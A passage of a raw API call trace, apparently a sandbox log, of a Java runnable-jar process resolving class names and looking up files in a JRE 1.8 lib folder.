(_Str1="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo", _Str2="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo") returned 0 [0018.200] strlen (_Str="") returned 0x0 [0018.200] strlen (_Str="") returned 0x0 [0018.200] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.200] strlen (_Str="AA") returned 0x2 [0018.200] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.200] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.200] strlen (_Str="A") returned 0x1 [0018.200] strlen (_Str="") returned 0x0 [0018.201] strlen (_Str="A") returned 0x1 [0018.201] strlen (_Str="") returned 0x0 [0018.201] strlen (_Str="A") returned 0x1 [0018.201] strlen (_Str="") returned 0x0 [0018.201] strlen (_Str="") returned 0x0 [0018.201] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.201] strlen (_Str="A") returned 0x1 [0018.201] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.201] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.201] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.201] strlen (_Str="AA") returned 0x2 [0018.201] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo", _Str2="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo") returned 0 [0018.202] strlen (_Str="") returned 0x0 [0018.202] strlen (_Str="A") returned 0x1 [0018.202] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo", _Str2="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo") returned 0 [0018.202] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.202] strlen (_Str="A") returned 0x1 [0018.202] strlen (_Str="") returned 0x0 [0018.202] strlen (_Str="A") returned 0x1 [0018.202] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo", _Str2="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo") returned 0 [0018.202] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.202] strlen (_Str="A") returned 0x1 [0018.202] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.203] strlen (_Str="") returned 0x0 [0018.203] strcmp (_Str1="java/lang/Object", _Str2="java/lang/Object") returned 0 [0018.203] strlen (_Str="AA") returned 0x2 [0018.203] strcmp (_Str1="java/lang/Object", _Str2="java/lang/Object") returned 0 [0018.203] strlen (_Str="I") returned 0x1 [0018.203] strlen (_Str="") returned 0x0 [0018.203] strlen (_Str="A") returned 0x1 [0018.203] strlen (_Str="1") returned 0x1 [0018.205] strlen (_Str="java/lang/String") returned 0x10 [0018.205] strlen (_Str="java/lang/ClassNotFoundException") returned 0x20 [0018.206] strlen (_Str="java/lang/IllegalArgumentException") returned 0x22 [0018.212] strlen (_Str="java/lang/IllegalAccessException") returned 0x20 [0018.213] strlen (_Str="java/lang/reflect/InvocationTargetException") returned 0x2b [0018.215] strlen (_Str="java/lang/SecurityException") returned 0x1b [0018.217] strlen (_Str="java/lang/NoSuchMethodException") returned 0x1f [0018.219] strlen (_Str="java/io/IOException") returned 0x13 [0018.223] strlen (_Str="java/lang/Thread") returned 0x10 [0018.226] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar") returned 0x33 [0018.226] wcscpy (in: _Dest=0x15011c68, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar" [0018.226] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar", nBufferLength=0x9, lpBuffer=0x4bedf0, lpFilePart=0x4bedec | out: lpBuffer="", lpFilePart=0x4bedec) returned 0x34 [0018.226] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar", fInfoLevelId=0x0, lpFileInformation=0x4bede0 | out: lpFileInformation=0x4bede0) returned 1 [0018.230] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\meta-index") returned 0x30 [0018.230] wcscpy (in: _Dest=0xb48b40, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\meta-index" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\meta-index") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\meta-index" [0018.230] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\meta-index", nBufferLength=0x9, lpBuffer=0x4beda0, lpFilePart=0x4bed9c | out: lpBuffer="", lpFilePart=0x4bed9c) returned 0x31 [0018.230] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\meta-index", fInfoLevelId=0x0, lpFileInformation=0x4bed90 | out: lpFileInformation=0x4bed90) returned 1 [0018.230] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\meta-index") returned 0x30 [0018.230] wcscpy (in: _Dest=0xb48b40, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\meta-index" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\meta-index") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\meta-index" [0018.230] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\meta-index" (normalized: "c:\\program files\\java\\jre1.8.0_92\\lib\\meta-index"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0018.231] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib") returned 0x25 [0018.231] _wfullpath (in: _Buffer=0xb992a0, _Path="C:\\Program Files\\Java\\jre1.8.0_92\\lib", _BufferCount=0x400 | out: _Buffer="C:\\Program Files\\Java\\jre1.8.0_92\\lib") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib" [0018.231] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib") returned 0x25 [0018.231] wcsncmp (_String1="C:\\Program Files\\Java\\jre1.8.0_92\\lib", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0018.231] wcslen (_String="C:\\Program Files") returned 0x10 [0018.231] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0x4be2d0 | out: lpFindFileData=0x4be2d0) returned 0x24f930 [0018.232] FindClose (in: hFindFile=0x24f930 | out: hFindFile=0x24f930) returned 1 [0018.232] wcslen (_String="Program Files") returned 0xd [0018.232] wcslen (_String="C:\\Program Files\\Java") returned 0x15 [0018.232] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java", lpFindFileData=0x4be2d0 | out: lpFindFileData=0x4be2d0) returned 0x24f930 [0018.232] FindClose (in: hFindFile=0x24f930 | out: hFindFile=0x24f930) returned 1 [0018.232] wcslen (_String="Java") returned 0x4 [0018.232] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92") returned 0x21 [0018.232] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92", lpFindFileData=0x4be2d0 | out: lpFindFileData=0x4be2d0) returned 0x24f930 [0018.232] FindClose (in: hFindFile=0x24f930 | out: hFindFile=0x24f930) returned 1 [0018.232] wcslen (_String="jre1.8.0_92") returned 0xb [0018.232] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib") returned 0x25 [0018.232] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib", lpFindFileData=0x4be2d0 | out: lpFindFileData=0x4be2d0) returned 0x24f930 [0018.232] FindClose (in: hFindFile=0x24f930 | out: hFindFile=0x24f930) returned 1 [0018.233] wcslen (_String="lib") returned 0x3 [0018.233] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib") returned 0x25 [0018.233] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib") returned 0x25 [0018.233] wcscpy (in: _Dest=0x15008a38, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib" [0018.233] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib", nBufferLength=0x9, lpBuffer=0x4bed00, lpFilePart=0x4becfc | out: lpBuffer="", lpFilePart=0x4becfc) returned 0x26 [0018.233] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib", fInfoLevelId=0x0, lpFileInformation=0x4becf0 | out: lpFileInformation=0x4becf0) returned 1 [0018.233] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib") returned 0x25 [0018.233] wcscpy (in: _Dest=0x15008a38, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib" [0018.233] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib", nBufferLength=0x9, lpBuffer=0x4bed00, lpFilePart=0x4becfc | out: lpBuffer="", lpFilePart=0x4becfc) returned 0x26 [0018.233] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib", fInfoLevelId=0x0, lpFileInformation=0x4becf0 | out: lpFileInformation=0x4becf0) returned 1 [0018.234] ReadFile (in: hFile=0x1c8, lpBuffer=0x4bcba4, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x4bcb6c, lpOverlapped=0x0 | out: lpBuffer=0x4bcba4*, lpNumberOfBytesRead=0x4bcb6c*=0x84e, lpOverlapped=0x0) returned 1 [0018.236] GetFileType (hFile=0x1c8) returned 0x1 [0018.236] SetFilePointerEx (in: hFile=0x1c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x4bebec | out: lpNewFilePointer=0x0) returned 1 [0018.236] GetFileSizeEx (in: hFile=0x1c8, lpFileSize=0x4bec10 | out: lpFileSize=0x4bec10*=2126) returned 1 [0018.252] ReadFile (in: hFile=0x1c8, lpBuffer=0x4bcb64, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x4bcb2c, lpOverlapped=0x0 | out: lpBuffer=0x4bcb64*, lpNumberOfBytesRead=0x4bcb2c*=0x0, lpOverlapped=0x0) returned 1 [0018.252] CloseHandle (hObject=0x1c8) returned 1 [0018.252] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\rt.jar") returned 0x2c [0018.252] wcscpy (in: _Dest=0x15011dd8, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\rt.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\rt.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\rt.jar" [0018.252] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\rt.jar", nBufferLength=0x9, lpBuffer=0x4bedf0, lpFilePart=0x4bedec | out: lpBuffer="", lpFilePart=0x4bedec) returned 0x2d [0018.253] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\rt.jar", fInfoLevelId=0x0, lpFileInformation=0x4bede0 | out: lpFileInformation=0x4bede0) returned 1 [0018.253] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\sunrsasign.jar") returned 0x34 [0018.253] wcscpy (in: _Dest=0x15011dd8, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\sunrsasign.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\sunrsasign.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\sunrsasign.jar" [0018.253] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\sunrsasign.jar", nBufferLength=0x9, lpBuffer=0x4bedf0, lpFilePart=0x4bedec | out: lpBuffer="", lpFilePart=0x4bedec) returned 0x35 [0018.253] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\sunrsasign.jar", fInfoLevelId=0x0, lpFileInformation=0x4bede0 | out: lpFileInformation=0x4bede0) returned 0 [0018.253] GetLastError () returned 0x2 [0018.253] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jsse.jar") returned 0x2e [0018.254] wcscpy (in: _Dest=0x15011dd8, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jsse.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jsse.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jsse.jar" [0018.254] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jsse.jar", nBufferLength=0x9, lpBuffer=0x4bedf0, lpFilePart=0x4bedec | out: lpBuffer="", lpFilePart=0x4bedec) returned 0x2f [0018.254] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jsse.jar", fInfoLevelId=0x0, lpFileInformation=0x4bede0 | out: lpFileInformation=0x4bede0) returned 1 [0018.254] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jce.jar") returned 0x2d [0018.254] wcscpy (in: _Dest=0x15011dd8, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jce.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jce.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jce.jar" [0018.254] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jce.jar", nBufferLength=0x9, lpBuffer=0x4bedf0, lpFilePart=0x4bedec | out: lpBuffer="", lpFilePart=0x4bedec) returned 0x2e [0018.254] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jce.jar", fInfoLevelId=0x0, lpFileInformation=0x4bede0 | out: lpFileInformation=0x4bede0) returned 1 [0018.255] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\charsets.jar") returned 0x32 [0018.255] wcscpy (in: _Dest=0xb48b40, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\charsets.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\charsets.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\charsets.jar" [0018.256] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\charsets.jar", nBufferLength=0x9, lpBuffer=0x4bedf0, lpFilePart=0x4bedec | out: lpBuffer="", lpFilePart=0x4bedec) returned 0x33 [0018.256] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\charsets.jar", fInfoLevelId=0x0, lpFileInformation=0x4bede0 | out: lpFileInformation=0x4bede0) returned 1 [0018.257] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jfr.jar") returned 0x2d [0018.257] wcscpy (in: _Dest=0x15011dd8, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jfr.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jfr.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jfr.jar" [0018.257] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jfr.jar", nBufferLength=0x9, lpBuffer=0x4bedf0, lpFilePart=0x4bedec | out: lpBuffer="", lpFilePart=0x4bedec) returned 0x2e [0018.257] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jfr.jar", fInfoLevelId=0x0, lpFileInformation=0x4bede0 | out: lpFileInformation=0x4bede0) returned 1 [0018.258] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\classes") returned 0x29 [0018.258] wcscpy (in: _Dest=0xb987a0, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\classes" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\classes") returned="C:\\Program Files\\Java\\jre1.8.0_92\\classes" [0018.258] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\classes", nBufferLength=0x9, lpBuffer=0x4bedf0, lpFilePart=0x4bedec | out: lpBuffer="", lpFilePart=0x4bedec) returned 0x2a [0018.258] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\classes", fInfoLevelId=0x0, lpFileInformation=0x4bede0 | out: lpFileInformation=0x4bede0) returned 0 [0018.258] GetLastError () returned 0x2 [0018.259] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\meta-index") returned 0x2c [0018.259] wcscpy (in: _Dest=0x15011dd8, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\meta-index" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\meta-index") returned="C:\\Program Files\\Java\\jre1.8.0_92\\meta-index" [0018.259] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\meta-index", nBufferLength=0x9, lpBuffer=0x4beda0, lpFilePart=0x4bed9c | out: lpBuffer="", lpFilePart=0x4bed9c) returned 0x2d [0018.259] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\meta-index", fInfoLevelId=0x0, lpFileInformation=0x4bed90 | out: lpFileInformation=0x4bed90) returned 0 [0018.259] GetLastError () returned 0x2 [0018.259] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar") returned 0x33 [0018.260] _wfullpath (in: _Buffer=0xb9a2d8, _Path="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar", _BufferCount=0x400 | out: _Buffer="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar" [0018.260] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar") returned 0x33 [0018.260] wcsncmp (_String1="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0018.260] wcslen (_String="C:\\Program Files") returned 0x10 [0018.260] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0x4be280 | out: lpFindFileData=0x4be280) returned 0x24f930 [0018.260] FindClose (in: hFindFile=0x24f930 | out: hFindFile=0x24f930) returned 1 [0018.260] wcslen (_String="Program Files") returned 0xd [0018.260] wcslen (_String="C:\\Program Files\\Java") returned 0x15 [0018.260] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java", lpFindFileData=0x4be280 | out: lpFindFileData=0x4be280) returned 0x24f930 [0018.260] FindClose (in: hFindFile=0x24f930 | out: hFindFile=0x24f930) returned 1 [0018.260] wcslen (_String="Java") returned 0x4 [0018.260] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92") returned 0x21 [0018.261] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92", lpFindFileData=0x4be280 | out: lpFindFileData=0x4be280) returned 0x24f930 [0018.261] FindClose (in: hFindFile=0x24f930 | out: hFindFile=0x24f930) returned 1 [0018.261] wcslen (_String="jre1.8.0_92") returned 0xb [0018.261] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib") returned 0x25 [0018.261] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib", lpFindFileData=0x4be280 | out: lpFindFileData=0x4be280) returned 0x24f930 [0018.261] FindClose (in: hFindFile=0x24f930 | out: hFindFile=0x24f930) returned 1 [0018.261] wcslen (_String="lib") returned 0x3 [0018.261] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar") returned 0x33 [0018.261] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar", lpFindFileData=0x4be280 | out: lpFindFileData=0x4be280) returned 0x24f930 [0018.261] FindClose (in: hFindFile=0x24f930 | out: hFindFile=0x24f930) returned 1 [0018.261] wcslen (_String="resources.jar") returned 0xd [0018.261] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar") returned 0x33 [0018.262] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar") returned 0x33 [0018.262] wcscpy (in: _Dest=0x15011e48, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar" [0018.262] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar", nBufferLength=0x9, lpBuffer=0x4becb0, lpFilePart=0x4becac | out: lpBuffer="", lpFilePart=0x4becac) returned 0x34 [0018.262] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar", fInfoLevelId=0x0, lpFileInformation=0x4beca0 | out: lpFileInformation=0x4beca0) returned 1 [0018.262] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar") returned 0x33 [0018.262] wcscpy (in: _Dest=0x15011e48, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar" [0018.262] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar", nBufferLength=0x9, lpBuffer=0x4becb0, lpFilePart=0x4becac | out: lpBuffer="", lpFilePart=0x4becac) returned 0x34 [0018.262] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar", fInfoLevelId=0x0, lpFileInformation=0x4beca0 | out: lpFileInformation=0x4beca0) returned 1 [0018.263] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar") returned 0x33 [0018.263] wcscpy (in: _Dest=0x15011e48, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar" [0018.263] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar", nBufferLength=0x9, lpBuffer=0x4bed20, lpFilePart=0x4bed1c | out: lpBuffer="", lpFilePart=0x4bed1c) returned 0x34 [0018.263] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\resources.jar", fInfoLevelId=0x0, lpFileInformation=0x4bed10 | out: lpFileInformation=0x4bed10) returned 1 [0018.264] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib") returned 0x25 [0018.264] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\rt.jar") returned 0x2c [0018.264] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\rt.jar", lpFindFileData=0x4be234 | out: lpFindFileData=0x4be234) returned 0x24f930 [0018.264] FindClose (in: hFindFile=0x24f930 | out: hFindFile=0x24f930) returned 1 [0018.264] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib") returned 0x25 [0018.264] wcslen (_String="rt.jar") returned 0x6 [0018.264] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\rt.jar") returned 0x2c [0018.265] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\rt.jar") returned 0x2c [0018.265] wcscpy (in: _Dest=0x15011dd8, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\rt.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\rt.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\rt.jar" [0018.265] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\rt.jar", nBufferLength=0x9, lpBuffer=0x4bed20, lpFilePart=0x4bed1c | out: lpBuffer="", lpFilePart=0x4bed1c) returned 0x2d [0018.265] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\rt.jar", fInfoLevelId=0x0, lpFileInformation=0x4bed10 | out: lpFileInformation=0x4bed10) returned 1 [0018.265] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib") returned 0x25 [0018.266] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\sunrsasign.jar") returned 0x34 [0018.266] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\sunrsasign.jar", lpFindFileData=0x4be234 | out: lpFindFileData=0x4be234) returned 0xffffffff [0018.266] GetLastError () returned 0x2 [0018.266] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\sunrsasign.jar") returned 0x34 [0018.266] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\sunrsasign.jar") returned 0x34 [0018.267] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\sunrsasign.jar") returned 0x34 [0018.267] wcscpy (in: _Dest=0x15011dd8, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\sunrsasign.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\sunrsasign.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\sunrsasign.jar" [0018.267] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\sunrsasign.jar", nBufferLength=0x9, lpBuffer=0x4bed20, lpFilePart=0x4bed1c | out: lpBuffer="", lpFilePart=0x4bed1c) returned 0x35 [0018.267] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\sunrsasign.jar", fInfoLevelId=0x0, lpFileInformation=0x4bed10 | out: lpFileInformation=0x4bed10) returned 0 [0018.267] GetLastError () returned 0x2 [0018.267] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib") returned 0x25 [0018.267] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jsse.jar") returned 0x2e [0018.267] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jsse.jar", lpFindFileData=0x4be234 | out: lpFindFileData=0x4be234) returned 0x24f930 [0018.268] FindClose (in: hFindFile=0x24f930 | out: hFindFile=0x24f930) returned 1 [0018.268] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib") returned 0x25 [0018.268] wcslen (_String="jsse.jar") returned 0x8 [0018.268] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jsse.jar") returned 0x2e [0018.268] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jsse.jar") returned 0x2e [0018.269] wcscpy (in: _Dest=0x15011dd8, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jsse.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jsse.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jsse.jar" [0018.269] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jsse.jar", nBufferLength=0x9, lpBuffer=0x4bed20, lpFilePart=0x4bed1c | out: lpBuffer="", lpFilePart=0x4bed1c) returned 0x2f [0018.269] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jsse.jar", fInfoLevelId=0x0, lpFileInformation=0x4bed10 | out: lpFileInformation=0x4bed10) returned 1 [0018.269] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib") returned 0x25 [0018.269] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jce.jar") returned 0x2d [0018.269] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jce.jar", lpFindFileData=0x4be234 | out: lpFindFileData=0x4be234) returned 0x24f930 [0018.269] FindClose (in: hFindFile=0x24f930 | out: hFindFile=0x24f930) returned 1 [0018.270] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib") returned 0x25 [0018.270] wcslen (_String="jce.jar") returned 0x7 [0018.270] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jce.jar") returned 0x2d [0018.270] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jce.jar") returned 0x2d [0018.270] wcscpy (in: _Dest=0x15011dd8, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jce.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jce.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jce.jar" [0018.270] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\jce.jar", nBufferLength=0x9, lpBuffer=0x4bed20, lpFilePart=0x4bed1c | out: lpBuffer="", lpFilePart=0x4bed1c) returned 0x2e [0018.271] 